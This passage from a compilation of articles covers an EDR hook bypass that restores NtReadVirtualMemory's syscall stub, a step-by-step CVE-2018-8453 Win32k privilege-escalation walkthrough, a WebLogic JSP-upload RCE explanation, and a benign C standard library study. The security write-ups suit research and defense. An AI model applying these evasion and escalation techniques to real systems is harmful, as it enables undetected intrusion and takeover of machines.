You must specify the signature of the function as well as link ntdll.lib into your project to do so. With everything in place, let’s run it and take a look! Now, this provides us with the address of both RPM and NtReadVirtualMemory. I will now use my favorite reversing tool, Cheat Engine, to read the memory and analyze its structure.

Figures: ReadProcessMemory, NtReadVirtualMemory

The RPM function looks fine. It does some stack and register setup and then calls ReadProcessMemory inside Kernelbase (topic for another time), which eventually leads you down into ntdll’s NtReadVirtualMemory. However, if you look at NtReadVirtualMemory and know what the most basic detour hook looks like, you can tell that this is not normal. The first 5 bytes of the function are modified and the rest are left as-is. You can tell this by looking at other similar functions around it. All the other functions follow a very similar format:

    0x4C, 0x8B, 0xD1,             // mov r10, rcx   ; NtReadVirtualMemory
    0xB8, 0x3C, 0x00, 0x00, 0x00, // mov eax, 3Ch   ; aka syscall id
    0x0F, 0x05,                   // syscall
    0xC3                          // retn

The one difference is the syscall id (which identifies the WINAPI function to be called once inside kernel land). For NtReadVirtualMemory, however, the first instruction is actually a JMP to an address somewhere else in memory. Let’s follow that.

Figure: CyMemDef64.dll

Okay, so we are no longer inside ntdll’s module but instead inside CyMemDef64.dll’s module. Ahhhhh, now I get it. The EDR placed a jump instruction where the original NtReadVirtualMemory function is supposed to be, redirecting the code flow into its own module, which then checks for any sort of malicious activity. If the checks fail, the Nt* function returns with an error code, never entering kernel land to execute in the first place.

The Bypass

It is now self-evident what the EDR is doing to detect and stop our WINAPI calls. But how do we get around that? There are two solutions.
Re-Patch the Patch

We know what the NtReadVirtualMemory function SHOULD look like, and we can easily overwrite the jmp instruction with the correct instructions. This will stop our calls from being intercepted by CyMemDef64.dll and let them enter the kernel, where the EDR has no control.

Ntdll IAT Hook

We could also create our own function, similar to what we are doing in Re-Patch the Patch, but instead of overwriting the hooked function, we recreate it elsewhere. Then we walk Ntdll’s Import Address Table, swap out the pointer for NtReadVirtualMemory, and point it to our new fixed_NtReadVirtualMemory. The advantage of this method is that if the EDR decides to check on its hook, the hook will look unmodified. It is simply never called, because the ntdll IAT points elsewhere.

The Result

I went with the first approach. It is simple, and it allows me to get the blog out quicker :). However, it would be trivial to do the second method, and I plan on doing just that within a few days. Introducing AndrewSpecial, for my manager Andrew, who is currently battling a busted appendix in the hospital. Get well soon, man.

Figure: AndrewSpecial.exe was never caught :P

Conclusion

This currently works for this particular EDR. However, it would be trivial to reverse similar EDR products and create a universal bypass, due to the limits on what they can and cannot hook (thank you, KPP). Did I also mention that this works on both 64-bit (on all versions of Windows) and 32-bit (untested)? And the source code is available HERE. Thank you again for your time, and please let me know if I made any mistake.

Source: https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6
  11. CVE-2018-8453: Win32k Elevation of Privilege Vulnerability Targeting the Middle East

2019-01-19 By 360 Threat Intelligence Center | Technical Research

Background

On October 10, 2018, Kaspersky disclosed a Win32k elevation of privilege exploit (CVE-2018-8453) captured in August. This vulnerability was used as a 0day in attacks targeting the Middle East to escalate privileges on compromised Windows systems. It is related to window management and graphic device interfaces (win32kfull.sys) and can be used to elevate user privileges to system permissions. It can also be used to bypass sandbox protection in software such as PDF readers, Office and IE, which makes the exploit extremely valuable. 360 Threat Intelligence Center performed a deep analysis of this vulnerability and came up with a PoC exploit that works on part of the affected Windows systems (both x86 and x64 versions of Windows 10).

Analysis Environment

The work was performed on Windows 10 x64 Version 1709 with the patches released before the CVE-2018-8453 fix:

Root Cause

This vulnerability is caused by a fault in the win32kfull!NtUserSetWindowFNID function, which fails to check whether the window object has been released while setting the FNID. This allows a new FNID to be set for a window that has already been released (FNID_FREED: 0x8000). By exploiting this defect, we can control the fnDWORD callback called in xxxFreeWindow when the window object gets destroyed, causing a UAF of pSBTrack in win32kfull!xxxSBTrackInit.

About FNID: By checking the leaked source code of Windows 2000 and related documentation in ReactOS, we figured out that FNID records what kind of window it is, such as a button or an edit box. It can also record the state of the window; for example, FNID_FREED (0x8000) means the window has been released.

POC – How to Trigger the Vulnerability

The vulnerability can be triggered by the following steps:

Step 1: We need to hook two callbacks in the KernelCallbackTable first.

Step 2: Create the main window and the ScrollBar.
Step 3: Send a WM_LBUTTONDOWN message to the scroll bar to trigger the call to the xxxSBTrackInit function. Hint: when you left-click a scroll bar, it triggers the call to win32kfull!xxxSBTrackInit. After that, xxxSBTrackLoop is called to capture mouse events in a loop, until the left mouse button is released or some other message is received.

Step 4: Call DestroyWindow(g_hMAINWND) in the callback function fnDWORD_hook when it gets executed by xxxSBTrackLoop. This results in a call to win32kfull!xxxFreeWindow. Because cbWndExtra was not 0 when the main window was registered, win32kfull!xxxFreeWindow calls xxxClientFreeWindowClassExtraBytes in order to release the extra data that belongs to the main window. The function in the above picture executes the KernelCallbackTable[126] callback, which results in our second hook being called.

Step 5: After entering our second hook function (fnClientFreeWindowClassExtraBytesCallBack_hook), we must manually call NtUserSetWindowFNID(g_hMAINWND, spec_fnid) to set the FNID of the main window (a value from 0x2A1 to 0x2AA; here we set spec_fnid to 0x2A2). At the same time, create a new scroll bar (g_hSBWNDNew) and call SetCapture(g_hSBWNDNew) to make g_hSBWNDNew the window that captures mouse events in the current thread.

Step 6: Since the main window is destroyed, xxxSBTrackLoop returns and continues to execute HMAssignmentUnLock(&pSBTrack->spwndNotify), dereferencing the main window so that it gets released completely. This causes xxxFreeWindow to be called again:

From the above picture, we know that once xxxFreeWindow is called, the window's FNID is marked with 0x8000. Since the FNID of the main window was set to 0x2A2 in step 5, LOWORD(FNID) will be 0x82A2 (the DestroyWindow call executed in step 4 invoked xxxFreeWindow, which marked the main window with 0x8000). So SfnDWORD is executed and enters our hook through the fnDWORD callback.
When we get into the fnDWORD_hook function again, it is our last chance to come back to R3. At this point, if SendMessage(g_hSBWNDNew, WM_CANCELMODE) is called, xxxEndScroll (see the win2k code shown below) is executed to release pSBTrack. Because the POC program is single-threaded, all windows created by the thread point to the same thread information structure. Even if the scroll bar window that SBTrack belongs to has been released, as long as the new window is created by the same thread, pSBTrack still points to the same one. The condition qp->spwndCapture==pwnd is satisfied since we are sending the WM_CANCELMODE message to the newly created scroll bar g_hSBWNDNew, and we previously called SetCapture(g_hSBWNDNew) so that the current thread captures mouse events in the g_hSBWNDNew window. Finally, UserFreePool(pSBTrack) is executed, releasing pSBTrack before HMAssignmentUnLock(&pSBTrack->spwndSB) runs, which results in a Use After Free of pSBTrack.

Exploit on Windows 10 x64

Since hooking callbacks in the KernelCallbackTable lets us release the pSBTrack in win32kfull!xxxSBTrackInit early and create a Use After Free, pool feng shui can be used to occupy the prematurely released pSBTrack in order to decrement arbitrary memory values in a loop. Combined with a desktop heap memory [2] leak and the GDI Palette Abuse technique, this gives arbitrary memory read/write and, finally, privilege escalation!

Implementation of Arbitrary Memory Value Deduction

From the above analysis, we know that the memory pointed to by pSBTrack has been released after calling HMAssignmentUnlock(&pSBTrack->spwndSBNotify). Continue to the next HMAssignmentUnlock(&pSBTrack->spwndSB), then take a look at the disassembly of HMAssignmentUnlock, and you will find a very interesting place:

Execution of lock xadd dword ptr [rdx+8],eax subtracts one from the DWORD pointed to by rdx+8.
After debugging the code, we figured out that pSBTrack->spwndSB is assigned to rdx! So, if we can control the value of pSBTrack->spwndSB, we can subtract one from any DWORD in memory. pSBTrack is released after we call SendMessage(g_hSBWNDNew, WM_CANCELMODE). So if we can immediately allocate an object (such as a Bitmap) with the same size as SBTrack and control the data of that object, there is a high probability that the freed pool block will be reassigned to the object.

Test Results:

Similarly, the next call, HMAssignmentUnlock(&pSBTrack->spwndSBTrack), performs another minus-one operation on arbitrary memory, this time on the memory at pSBTrack->spwndSBTrack+8. So we can reduce an arbitrary memory value by one or two by controlling the data in the Bitmap that gets sprayed into the space previously used by pSBTrack. A single minus-one operation only requires either pSBTrack->spwndSB or pSBTrack->spwndSBTrack to be 0, and the other one to be address - sizeof(PVOID). As long as we repeatedly trigger this process, we can reduce the memory value by one or two many times in order to change it to a specified number:

    result = target - repeat_count
    result = target - repeat_count * 2

Obviously we have to know the original value first in order to reduce it to the value we want. Therefore, there are some limitations compared with setting the value directly.

Hint: If we need to change 0x02000000 to 0x00000000, do we need to repeat the minus-two operation 0x01000000 times? The answer is no. Because we can decrement an arbitrary DWORD in memory by one or two, the target address can be adjusted so that "0x02" becomes the low byte of the DWORD. The task then becomes changing 0x00000002 to 0x00000000, which needs just one loop, with no need to worry about loop count limitations.

Use the GDI Palette to Achieve Arbitrary R/W

Below is the documented PALETTE data structure:

    typedef struct _PALETTE64
    {
        BASEOBJECT64 BaseObject;
        ...
        ULONG64 pRGBXlate;
        PALETTEENTRY *pFirstColor;
        struct _PALETTE *ppalThis;
        PALETTEENTRY apalColors[3];
    }

Member apalColors is an array. Each element of the array is 4 bytes in size, and its content can be specified by the user. pFirstColor, similar to the pvScan0 pointer in the Bitmap, points to the array and can be used to construct the R/W primitive. The following relationship holds, and by using it we can know the initial value of the memory pointed to by pFirstColor:

    Address of PALETTEENTRY = Address of pFirstColor + sizeof(PVOID)*2

Similar to how a Bitmap manipulates data in the pixel area through GetBitmapBits and SetBitmapBits, PALETTE uses GetPaletteEntries and SetPaletteEntries to manipulate the data pointed to by pFirstColor. So we can construct two Palettes, named hManager and hWorker respectively:

If we can get the values of hManager's pFirstColor and hWorker's pFirstColor, then we can use the arbitrary memory value deduction approach above to reduce hManager->pFirstColor to the same value as hWorker's pFirstColor. After that we can use hManager to call SetPaletteEntries to control hWorker->pFirstColor, then use hWorker to call SetPaletteEntries and GetPaletteEntries to achieve arbitrary memory read/write.

Fortunately, we can use the following techniques to stabilize the values of hManager's pFirstColor and hWorker's pFirstColor, and to make hManager's pFirstColor not much larger than hWorker's pFirstColor.

Use the Desktop Heap to Leak GDI Palette Address

The name of a window menu can be quite long, lpszMenuName and Palette are in the same memory pool, and we can get the kernel address of lpszMenuName through the tagWND pointer returned by HmValidateHandle. We can therefore use the desktop heap [2] to help us predict the kernel address of the pFirstColor pointer. With proper construction, the accuracy rate can reach 100%.
First we need to repeatedly create and delete a window object to allocate and release a hole. When the address stops changing, it means that the next time you construct a Palette object with a size equal to lpszMenuName, the Palette object will be allocated at the address of the lpszMenuName that has just been released:

Then we can get the kernel address of pFirstColor by using its offset inside _PALETTE64:

hManager->pFirstColor can then be changed to hWorker's pFirstColor value by using the arbitrary deduction operation above, in order to achieve arbitrary memory read/write.

Privilege Escalation by Arbitrary Memory R/W

Since arbitrary memory read/write is available at this point, we can enumerate the EPROCESS chain to get the token value of the system process as well as the token address of the current process. Then we can perform privilege escalation by copying the token value from the system process to the current one.

How to get the EPROCESS of the system process at the user level? You can get it by looking up PsInitialSystemProcess [3] in ntoskrnl.exe:

Code to get the _EPROCESS of the current process:

Use arbitrary memory read/write to copy the Token:

Exploit Process in Summary

360 Threat Intelligence Center summarized the entire process as follows:

1. Get the pFirstColor values of hManager and hWorker by using the desktop heap leak technique.
2. Trigger the vulnerability multiple times to change the value of hManager->pFirstColor to the value of pFirstColor in hWorker.
3. Perform privilege escalation by arbitrary memory read/write.
4. Use arbitrary memory read/write to trick the operating system into not cleaning up the Bitmap object. Without this step, the system will release the Bitmap object when the program is closed, causing a Double Free and a Blue Screen.

Screenshot:

Patch Analysis

By using BinDiff, we find that in the patched version of win32kfull!NtUserSetWindowFNID, IsWindowBeingDestroyed is called to check whether the window has been released before a new FNID is set.
It returns directly if the window object has been released and does not allow a new FNID value to be set. So after we call DestroyWindow, the call to NtUserSetWindowFNID to set the FNID will fail. The vulnerability is fixed because this approach prevents us from releasing pSBTrack in advance.

Conclusion

After investigation, we came up with a PoC exploit for Windows 10 Pro v1709 x86/x64 that performs privilege escalation successfully when the system is not patched. For other Windows versions, we only need to change the offsets of the corresponding data structures, such as the offset of Token inside _EPROCESS.

References

[1] https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/
[2] https://blogs.msdn.microsoft.com/ntdebugging/2007/01/04/desktop-heap-overview/
[3] https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/mm64bitphysicaladdress
[4] https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig
[5] https://www.anquanke.com/post/id/168572#h2-1
[6] https://www.anquanke.com/post/id/168441#h2-0
[7] ed2k://|file|cn_windows_10_multi-edition_vl_version_1709_updated_sept_2017_x64_dvd_100090774.iso|4630972416|8867C5E54405FF9452225B66EFEE690A|/

Source: https://ti.360.net/blog/articles/cve-2018-8453-win32k-elevation-of-privilege-vulnerability-targeting-the-middle-east-en/
  12. [Video] Proof of Concept: CVE-2018-2894 Oracle WebLogic RCE

Kristian Bremberg / November 14, 2018

A recent vulnerability affecting Oracle WebLogic Server was sent in to Crowdsource. The vulnerability is an unauthenticated remote code execution (RCE) that is easily exploited. In this article we will go through the technical aspects of the Oracle WebLogic RCE vulnerability and its exploitation.

Proof of concept video:

How the exploit works:

The vulnerability affects the Web Services (WLS) subcomponent. The path /ws_utc/config.do (on port 7001) is by default reachable without any authentication; however, this page is only available in development mode. To make the vulnerability exploitable, the attacker needs to set a new Work Home Dir, which has to be writable. The path servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css works for this. After the new writable Work Home Dir is set, it is possible to upload a JSP file in the Security tab.

Image: The interface where it is possible to save a Work Home Dir, which will be the path where JKS keystores are saved.

The page is meant for uploading JKS keystores, but it lets an attacker upload JavaServer Pages (JSP) files instead. These uploaded files can then be accessed and executed. The upload is done as multipart/form-data to the path ws_utc/resources/setting/keystore. The server then responds with XML containing the keyStoreItem ID, which is used to reach the uploaded file in the format /ws_utc/css/config/keystore/1582617386107_filename.jsp

Image: After a successful upload of a JKS keystore, the response will contain its ID.

Impact:

If an attacker acts upon this vulnerability, they may be able to completely compromise the server. Because the test page only exists in development mode, it is very important to check that your WebLogic server is not running in development mode.
In some cases port 7001 is filtered and therefore not reachable from the Internet. For an attacker it is very easy to detect this vulnerability. WebLogic is easily fingerprinted (with its Server header), and a quick search on Shodan shows that there are many instances open on the Internet.

Additional information:

For the full security advisory about the Oracle WebLogic RCE, see the Oracle Critical Patch Update Advisory.

Written by Kristian Bremberg
Edited by Jocelyn Chan

Source: https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/
  13. Inside the C Standard Library

January 19, 2019

After diving into the C language through K&R, and then studying portability (see C Portability Lessons from Weird Machines), my next challenge was to take a systematic look at the standard library. To do this I worked through P. J. Plauger’s book The Standard C Library (ISBN 978-0131315099), where he examines an implementation of all the functions. It has a chapter for each header, with background information, an excerpt from the C89 standard, tips on use, and a full implementation with tests. The author was on the X3J11 committee that defined ANSI C.

As I worked through the book (trying first to write the examples myself, then comparing his code to mine, and finally running the examples) I kept notes with questions about portability, rationale, and C behavior. By cross-referencing the following books, asking questions on IRC, and browsing StackOverflow and the comp.lang.c archives, I found satisfactory answers.

- “The C Standard: Incorporating Technical Corrigendum 1” by The British Standards Institution (ISBN 978-0470845738). This is the C99 standard itself (rather than C89 like Plauger’s book), and it includes an entire first half devoted to the rationale behind language and library choices. This is helpful for understanding C semantics.
- “Portable C Software” by Mark R. Horton (ISBN 978-0138680503). Written after ANSI C was standardized, but early enough that it wasn’t fully adopted. He provides early history of each standard library function, as well as some functions that are now defunct.
- “Portable C” by Henry Rabinowitz (ISBN 978-0136859673). Great for illustrating the design decisions of the language as it relates to diverse hardware.
- “The CERT C Coding Standard” by Robert C. Seacord (ISBN 978-0321984043). Illustrates potential insecurity with, among other things, the standard library. Lists real code that caused vulnerabilities.
- “C Programming FAQs” by Steve Summit (ISBN 978-0201845198). I can see why these were historically the most frequently asked questions. I asked many of them myself.

This article is not a comprehensive explanation of the standard by any means. It’s just things that were new or interesting to me. Some of it may be old news to you, and conversely I may have omitted something that seemed basic to me but would have been useful to mention. The focus is C89, with comparisons to the later standards C99 and C11 when relevant.

Brief History of the Library

Functions in the library grew organically from communities of programmers sharing ideas and implementations. Many groups of people used C on Unix throughout the 70s, across multiple architectures. They wrote compilers with extra features, and experimented with additions to Unix. By February 1978 core C practice had stabilized to the point where Kernighan and Ritchie codified it in the first edition of their book The C Programming Language (ISBN 978-0131101630).

By 1980 C users formed the “/usr/group” organization to combine their library experience into an informal standard, which they released in 1984. Meanwhile in 1983, the American National Standards Institute (ANSI) formed a committee, X3J11, to establish a standard specification of C and officially standardize the library. The committee reviewed the work of /usr/group, K&R 1st edition, and various compiler extensions. They deliberated from 1983 to 1989 to produce the C89 standard (“ANSI C”).

“Design by committee” may not have pleasant associations for some people, but in this case the committee drew on a lot of experience, and often declined to speculatively innovate, working to clarify existing practice instead. The result was a small, tight language and standard library.

Compared with libraries in other languages, the standard C library is lean. It doesn’t have much in the way of general algorithms or containers. This helped the language port easily and more widely.
The library has basic facilities for time, math, I/O etc, and operates on simple types. It also provides portable facilities to do non-portable things, like variadic arguments, and non-local gotos.

assert.h

A simple way to halt a program with debugging information if an assumption doesn’t hold:

    #include <assert.h>

    int main(void)
    {
        assert(1 == 0);
    }

    /* outputs
    Assertion failed: (1 == 0), function main, file assert.c, line 2.
    Abort trap: 6
    */

Because it echoes the statement under test and includes a filename and line number, it’s useful for a quick and dirty test suite. Furthermore, assert() calls abort() rather than exit(), which causes the program to quit and dump core if permitted by the operating system. If the binary was compiled with debugging support you can load that core file in a debugger and inspect the program’s full state at the time the assertion was made:

    gdb -c /path/to/corefile
    # ^^^ inspect variables, backtrace, etc in the debugger

This means that littering functions liberally with assertions can be a good way to debug problems. It provides richer information than debug print statements in situations where it’s OK to terminate the program. It also adds no overhead to the final release, because the assertions will be removed by the preprocessor when compiled with NDEBUG defined. This can be done by adding -DNDEBUG to CFLAGS or by adding a regular #define NDEBUG in the code.

All headers in the standard library are idempotent, except assert.h. By including it multiple times in a file you can enable or disable the assert macro.

    #define NDEBUG
    #include <assert.h>
    /* Now assert() won't do anything... */

    #undef NDEBUG
    #include <assert.h>
    /* Now assert() works again */

It’s OK to include assert.h twice in a row because it causes what C calls a “benign” redefinition of the assert macro.
    /* no harm, this is a benign redefinition: */
    #define FUN 1
    #define FUN 1

    /* not benign and not allowed: */
    #define FUN 1
    #define FUN 2

A properly designed assert macro should work in any context, even somewhere weird like for (i = 0, assert(n<10); i < n; ++i). Because I didn’t think of this, my own attempt at writing assert used an if statement. In fact this is what Mark Horton shows in his Portable C Software book:

    /* incorrect definition */
    #ifndef NDEBUG
    #define assert(p) (if(!(p)) ... )
    #else
    #define assert(p) ;
    #endif

This can be improved. Plauger uses the ternary operator, and substitutes the result ((void)0) when the predicate holds. He also keeps the code (to print the error and exit) in a real function which is defined in a separate source file. That’s because headers in the standard library are not allowed to include each other. It’s a self-imposed discipline.

The last trick I found interesting was how to delay preprocessor evaluation into two steps using these helpers:

    /* a "thunk" to evaluate __LINE__ */
    #define _STR(x) _VAL(x)
    #define _VAL(x) #x

The string can then be built as

    "Assertion failed: " #p ", file " __FILE__ ", line " _STR(__LINE__) "\n"

Finally, some implementations tolerate an arbitrary scalar expression as the argument to assert, but the ANSI committee decided to require int expressions for correct operation.

Given that it was the first header I saw in Plauger’s book, this is where I learned that the standard reserves names like _Foo, starting with an underscore and a capital letter, for the standard library. Don’t use that naming convention in regular code.

ctype.h

Although I learned a few things from this header, it was ultimately kind of a letdown. It’s not sufficient for international text processing because, while the functions operate on the int type, they specify that its value should fall in the range of unsigned char or the negative value EOF.
So while non-English speakers can use a new codepage for their locale, it will be unable to hold more than 255 symbols (plus \0, plus EOF), which is too few for East Asian languages. C99 introduced wctype.h to operate on wide characters, but that has its own problems. (More about that in the stdlib.h section below.)

Even for languages which fit in an 8-bit codepage, the ctype functions don’t always suffice. For example the German letter ß uppercases into two letters, SS. The toupper() function in ctype.h can’t handle it, because it replaces one character with exactly one other. The Greek letter Σ ordinarily lowercases to σ, except at the end of a word where it should be ς. The tolower() function doesn’t have enough context to pick the correct form.

I still learned some interesting techniques by studying this header. Plauger implements all the isxxxxx() functions with a lookup table of bit-packed shorts. The table itself is specific to EOF (from stdio.h) being -1, and relies on a certain size of unsigned char. The code uses a nice trick to fail early on a system where this assumption is incorrect:

    #include <limits.h>
    #include <stdio.h>

    #if EOF != -1 || UCHAR_MAX != 255
    #error WRONG TABLES IN CTYPE.H
    #endif

Although the code is non-portable, it fails in the most honest and upfront way possible at compile time.

Also as a historical note, the isxxxxx() functions used to be defined only for 7-bit characters, but ANSI requires them to handle all values for unsigned char.

One advantage of using a lookup table is that the value to be looked up requires only one evaluation. Thus the lookup function can be a macro without danger of executing code with a side effect more than once.

    /* evaluates c at least twice */
    #define isalpha(c) \
        (((c) >= 'a' && (c) <= 'z') || ((c) >= 'A' && (c) <= 'Z'))

    /* evaluates c only once */
    #define isalpha(c) (_Ctype[(int)(c)] & (_LO|_UP))

    /* consider how this would behave */
    if (isalpha(c = getchar())) ...
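To make the question above concrete, here is a small sketch that counts how many times the macro argument is evaluated. Every name in it (IS_ALPHA_RANGE, IS_ALPHA_TABLE, alpha_table, next_char and the two reads_with_* functions) is hypothetical and chosen for illustration; it is not Plauger's code, and it assumes an ASCII-compatible character set.

```c
#include <limits.h>

/* Range-test version: the argument appears four times in the expansion. */
#define IS_ALPHA_RANGE(c) \
    (((c) >= 'a' && (c) <= 'z') || ((c) >= 'A' && (c) <= 'Z'))

/* Table version: the argument appears exactly once in the expansion. */
#define IS_ALPHA_TABLE(c) (alpha_table[(unsigned char)(c)])

static unsigned char alpha_table[UCHAR_MAX + 1];
static const char *cursor; /* stands in for an input stream */
static int reads;          /* how many characters were consumed */

/* A getchar() stand-in with a visible side effect. */
static int next_char(void)
{
    ++reads;
    return (unsigned char)*cursor++;
}

/* Fill the table once, reusing the range test (ASCII assumption). */
static void init_table(void)
{
    int i;
    for (i = 0; i <= UCHAR_MAX; ++i)
        alpha_table[i] = IS_ALPHA_RANGE(i);
}

/* s must hold at least three characters plus the terminator,
   because the range macro may consume up to four. */
int reads_with_range_macro(const char *s)
{
    cursor = s;
    reads = 0;
    (void)IS_ALPHA_RANGE(next_char());
    return reads;
}

int reads_with_table_macro(const char *s)
{
    init_table();
    cursor = s;
    reads = 0;
    (void)IS_ALPHA_TABLE(next_char());
    return reads;
}
```

Under these assumptions, calling reads_with_range_macro("Qx!") consumes three characters for a single "test", and each comparison looks at a different character, while reads_with_table_macro("Qx!") consumes one.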
Using macros for these little functions is good for performance. However, every library function in the standard library (unless specifically noted otherwise) must be represented as an actual function too, in case a program wishes to pass its address as a parameter to another function. How can we define a function called “isalpha” if that name is also recognized by the preprocessor? I learned you can just enclose the name in parens:

    int (isalpha)(int c)
    {
        return (_Ctype[(int)(c)] & (_LO|_UP));
    }

    /* now &isalpha will be defined if needed */

The trick is used throughout the standard library but I first saw it in ctype. Conversely, every library function is a candidate for redefinition as a macro, provided that the macro evaluates each of the arguments exactly once and parenthesizes them thoroughly. (Well, getc is an exception but more on that later.)

Another trick is to perform an array lookup using a pointer that is shifted forward in the original array.

    static const short ctyp_tab[257] = {0, /* ... */};
    const short *_Ctype = &ctyp_tab[1];

The shifted pointer allows EOF (-1) to be looked up easily without undefined behavior. The expression _Ctype[EOF] means _Ctype[-1] which is the same as *(ctyp_tab+1-1), which does not attempt to dereference (or even point to) memory before a primary data object. Pointers are allowed to be assigned only addresses either inside, or one space to the right, of a data object. (Data objects are arrays, structures, or regions allocated from the heap. See Rabinowitz’s book for a good discussion of this.)

Character codes 128-255 are interpreted as negative numbers when considered as signed char. C does not specify whether char is signed or unsigned (it varies by platform). When char is signed, beware of converting it to int for the ctype functions. The integral promotion will “sign-extend,” creating a negative int value.
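The sign-extension hazard can be seen in a short sketch. The helper names (promoted_value, as_unsigned, safe_isalpha) are made up for illustration, and the value 233 in the comment assumes the usual 8-bit unsigned char.

```c
#include <ctype.h>

/* What a ctype function would receive if a negative char were
   passed straight through: promotion keeps the negative value. */
int promoted_value(signed char ch)
{
    return (int)ch;
}

/* Converting to unsigned char first wraps the value into
   0..UCHAR_MAX, e.g. -23 becomes 233 with 8-bit chars. */
int as_unsigned(signed char ch)
{
    return (unsigned char)ch;
}

/* A common defensive idiom: cast before calling into ctype. */
int safe_isalpha(char ch)
{
    return isalpha((unsigned char)ch) != 0;
}
```

With a wrapper like safe_isalpha the caller never hands ctype a negative value other than EOF, whichever signedness the platform picked for plain char.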
This is not suitable for ctype functions, which require int values that are either storable in unsigned char or are the special EOF value. To avoid sign extension, cast char values to unsigned char in calls to ctype functions.

errno.h

Errno is the mechanism everyone loves to hate. The X3J11 committee wanted to remove it but decided not to make such a radical innovation on existing practice. In the early drafts of the standard it was kept in stddef.h, but they decided that stddef should exist on freestanding environments and they split errno.h off into its own header.

Not much to say about it. The errno global variable is set to zero at the start of program execution. Library functions can set it to nonzero values but will never set it to zero themselves. To use it, explicitly set it to zero yourself, call a library function, then check whether errno changed.

One interesting tidbit is that errno is sometimes not a global variable at all, but a macro for (*_Error()). Having to set a real data object immediately after performing hardware floating point ops would break the FPU pipeline. Allowing the check to be deferred until requested with this _Error() function doesn’t break the pipeline.

float.h, limits.h, and math.h

Both float.h and limits.h are inventions of the committee. You can generate them with the enquire program written by Steven Pemberton. It performs runtime checks on the data types to find information about them, then generates the desired header file. It’s extremely portable. It also detects and outputs information about the representation of base types, like endianness.

I decided not to slow down to study these headers in depth because I lack the knowledge of floating point representation necessary to understand the internals of the functions inside. I do know the definitions and parameters in float.h were recommended by numerical analysts on the Committee.
The set was chosen so as not to prejudice an implementation’s selection of floating-point representation. The math functions are written carefully to avoid overflow and underflow. I’ll revisit the topic after studying Michael Overton’s short book, “Numerical Computing with IEEE Floating Point Arithmetic.” locale.h Changing a program’s locale tells it how to handle local customs. There are multiple locale categories that can be adjusted independently. They control different things, like the codeset used by ctype, the date or monetary formatting desired, or alphabetical sort order. Typically all categories are set to the same locale. The alternative – a so called “mixed locale” – is less common. Some of the settings are meant for interpretation by your own program, and others automatically affect the C standard library. For example, when parsing a double, strtod checks what the current locale uses for a decimal point symbol. Even if you want to avoid ctype and use a third-party Unicode library, some of the locale information is still useful for your program. By default C programs use the “C” locale, which is ASCII text and American formatting. The most respectful thing, though, is to accept the locale in all categories as set by system environment variables. This is indicated by the empty string for locale name. #include <locale.h> #include <stdio.h> #include <stdlib.h> int main(void) { if (setlocale(LC_ALL, "") == NULL) { fputs("Unable to select system locale", stderr); return EXIT_FAILURE; } /* ... */ } To see what locales are known on your local system, run locale -a There are 203 installed on MacOS. The list begins with: en_NZ nl_NL.UTF-8 pt_BR.UTF-8 fr_CH.ISO8859-15 eu_ES.ISO8859-15 en_US.US-ASCII af_ZA … They are in the format [language[_territory][.codeset]]. OpenBSD has chosen to support only the “C” (aka “POSIX”) and “UTF-8” codesets, but supports many languages and territories in the other locale categories. 
Unicode subsumes all those partial character encodings, so BSD just wanted to eliminate a source of complexity.

One way to see locales in action is by setting environment variables and using Unix tools. We can change sort order using LC_COLLATE.

    cat <<EOF >cn.txt
    我
    喜
    歡
    整
    理
    單
    詞
    EOF
    LC_COLLATE=C sort <cn.txt
    LC_COLLATE=zh_CN.UTF-8 sort <cn.txt

The two results side by side (the right-hand column is the plain byte order of the C locale, the left-hand column is the zh_CN.UTF-8 order):

    理 喜
    我 單
    詞 我
    歡 整
    整 歡
    喜 理
    單 詞

Setlocale() doesn’t play well with threads because it updates an internal global variable. Set the locale before spawning threads.

One other random nugget of wisdom from the book, unrelated to locales but mentioned in that chapter, is to use a tool to visualize the call tree in a C program. This can help you understand a new codebase. Try cflow. See also Steve Summit’s C FAQ question 18.1.

setjmp.h

The setjmp/longjmp functions create a “saveable goto” statement to return to places you’ve already been. They allow jumping from one function into another. They are like the C programmer’s version of exception handling. Setjmp and longjmp are very tricky inside, as they have to save and restore variables, arguments, registers etc to resume execution in another location.

    #include <setjmp.h>
    #include <stdio.h>

    void dostuff(void);

    jmp_buf target;

    int main(void)
    {
        if (setjmp(target) == 0)
        {
            puts("Saved the target, continuing on.");
            dostuff();
        }
        else
            puts("I feel like I've been here before...");
        return 0;
    }

    void dostuff(void)
    {
        longjmp(target, 42);
    }

To indicate that the jmp_buf was set, setjmp returns 0. When execution is jumped back to this point, setjmp returns the value passed as the second argument to longjmp, for us 42. The same if statement is evaluated again but with a different result, like waking up in an alternate universe.

As simple as this looks, it’s easy to break. The statement containing setjmp must be very simple. Calling setjmp in an if statement or switch statement is fine, but you should not save the return value like n = setjmp(...).
An assignment statement is too complicated and can disturb the sensitive machinery. The function containing setjmp should be as simple as possible. Only variables declared as volatile are guaranteed to be restored. Generally it’s best to execute the real processing in another function called when setjmp returns 0. Longjmp should not be called from an exit handler (i.e., a function registered with the atexit function). Finally it’s undefined behavior to attempt to longjmp to a function that has since returned. Thus longjmp’s usual use case is like exceptions in other languages, going back up the call chain, skipping intermediate functions. The jmp_buf type is actually an array behind a typedef, which is why it’s typically passed to setjmp without an ampersand. The standard forbids jmp_buf to be implemented as a scalar or struct. Given all these caveats, the committee considered requiring that compilers recognize calling setjmp as a special case. Then the function could work in all types of statements. However they decided against it for consistency because they don’t require any other function to be a special case (although they allow compiler writers to make special cases as desired). signal.h Signals are a UNIX technique for interprocess communication that causes a process to asynchronously call a handler function, or else take a default action. Programs also receive “synchronous” signals for their own logical exceptions like division by zero, segmentation faults, or floating point problems. The ANSI committee decided to standardize a weakened portable version of signal functionality. Portable signal handlers can do very little. Here’s a typical example of what a handler can do safely: /* a global */ volatile sig_atomic_t intflag = 0; /* SIGINT handler */ void field_int(int sig) { signal(SIGINT, &field_int); intflag = 1; return; } It does as little as possible, simply setting a global variable which regular code can check at leisure. 
One thing to note is that it re-installs itself in the very first line with the signal() function. That’s because on some platforms (like Linux), as soon as a signal is handled it reverts to its default handler, which in the case of SIGINT terminates the program. Other systems such as BSD leave a handler installed when called. On Linux this would be an unwise thing to do:

    void field_int_badly(int sig)
    {
